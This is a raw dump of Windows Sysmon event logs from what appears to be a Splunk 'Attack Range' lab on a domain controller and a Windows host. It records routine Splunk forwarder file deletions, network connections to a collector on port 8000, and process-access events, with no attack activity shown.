11:23:08.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18EED8EA82476E76ADCB88DAE92908E7,SHA256=1DCBC5407AA0E3753D1FF7B16C307122EFA51576DC627CE19AEF962084465348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:08.107{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3E1D83C51C2E5613E0F31234BC2C7B,SHA256=2E41DF61CDE1ABCD470890C62684DB5706A8A81EC8DCBFDCC83948167D552EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:09.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4B4B9FCCBBE374FC382F12CA4869835,SHA256=FC7BCE7E40294BFAB506669329CBAD22796EA725D3C88EF63047AE0F26294D49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:09.156{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB3D89FA5CD7E224C03CB7DBB306A70E,SHA256=DE4AA078E19B8C5CDDC7B4D928F5CBACD840E316B69DB0B719A08B983595CAC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:10.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5A2A09AEE6ABC123E82E31BE2F8DBD,SHA256=8B2B4AD0E352D59826638375F80FC11C5016BA09089768E80FD64DE7CE8CD295,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:07.705{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49550-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:10.187{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35092EB23430F13DA2D70D0964820D4A,SHA256=19D3BD4CFA079243053A474A540F224D9EC244E29D32251EE575B8CD5BD0D606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:11.259{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38CD4184163B882AFC05A407D11EEC53,SHA256=20D6C2554F465CDF971367BF04F70F0F018EF4DB5BEB8D2E850D9C36C88C1CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:11.187{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A57955925DBC966D9AD186C800BACCCB,SHA256=8DEE9365443094B64F0C3C9E65D58C285A6B92F0C6292049D6138044F4F846F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:10.574{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51721-false10.0.1.12-8000- 23542300x8000000000000000222502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:12.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60ABE5841DBD1538B62872D4D3747130,SHA256=D46D858A63C4016D1A823975B74855158613C39D0789ECCC9BE2B8C5C3BD01CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:12.205{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B376728D300672FBD8E2AD61F9C8A1E,SHA256=05D6B03600E5F5C4D1DF47F42E89AF3998C817C36DF9C614AF4E1F183778D3A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:13.255{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F53AB0DF9D35FF8CBBAFB1F3229F3226,SHA256=1B622CA7A95AAA0B2DBF8807682AB492A90A29C3C8D2657D47DC1767E7F6C863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:13.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47FE2467AE41F3032CE0726888B5D186,SHA256=D116F883A647B7FDD364355A63540FB16C5257F4FE08908843A0423F462A6A0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:14.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2156328CB9C3DB566F8B21517EAFE04,SHA256=EC4EA257A25F221DF0D11353E64DC06B331BAE0D31871D8CA4A354F9DE5960A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:14.306{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07EB92C0A7770682FC529730F77B2AE6,SHA256=19A2A4B77F7CBE1771DFAAF39860A5490351E0D8D7FB096D80A8FE9BC7127055,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:15.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BFC01C1379D7BDD6588899E12D23D9,SHA256=A3FB2B7EF397D55719F78E2853E76499518C2D0FCF7E12B26C95BDF3936CF1E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:15.324{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C54799D61A622BB2467E1488A2F9A80,SHA256=161188A41D090D94A125E32C58A69D7D262FD4998FF7964D7F440B16F639688A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:16.430{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A26DB9EB391D6A0293654DE2E775CC25,SHA256=9D61100AA7BC9A28CE2932277687781D4CF8D6B54E23D64DE4DB6B349AA080E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:16.354{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99ED8CCD7BA68A486C62F938215F026D,SHA256=231433CB53657B9201A03F5DA9E7BDEF0E7F2C8C99DFBCC5CE3F8E09F44686B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:13.635{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49551-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:17.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD2DC9A2FDDD069FBE54F13B61588514,SHA256=2CB0FDBF99B3D4DC4B5BF2496E52FCFF01276618026E9F623F5F98E25D9898E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:17.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=895519EFD7E4D8BECFD8FB448B9F2609,SHA256=C37CC1D9A7FCE69637775835987BE9327149F2D0519017193ED47ECCFB6D8961,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:16.558{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51722-false10.0.1.12-8000- 23542300x8000000000000000222509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:18.649{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C99FD6CADD22FBAB700E2527CB09AE1B,SHA256=20584BACE5478D97E4969CAF8A2805D2F02540138D9ADB02C73EA8048A7C909F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:18.403{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58D205269F5B2C5CE34D4913B1A85B25,SHA256=0D6A3ABAB9D53A909B8DF7EE2D2291389F58073F1FF5863FB0C30CE75C5BEF8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:19.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D1832E2C678E136FCE285384DE8D6E6,SHA256=424297E71C3CAC043410496427B353C537C2F6AB6E30074C74A0433EED46BCE7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.820{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1927-6216-5E07-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.820{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.820{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.820{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.820{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.820{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1927-6216-5E07-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.820{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1927-6216-5E07-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.823{C8EA50B7-1927-6216-5E07-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.552{C8EA50B7-1927-6216-5D07-000000003802}51726636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.421{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF6BD990AA328957C4D7D5EB88E514F5,SHA256=CE13F84F553C16C8AA4DC5BB0EB77120E2288AAD9ED764C956348A0408EF32EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.221{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1927-6216-5D07-000000003802}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.221{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.221{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 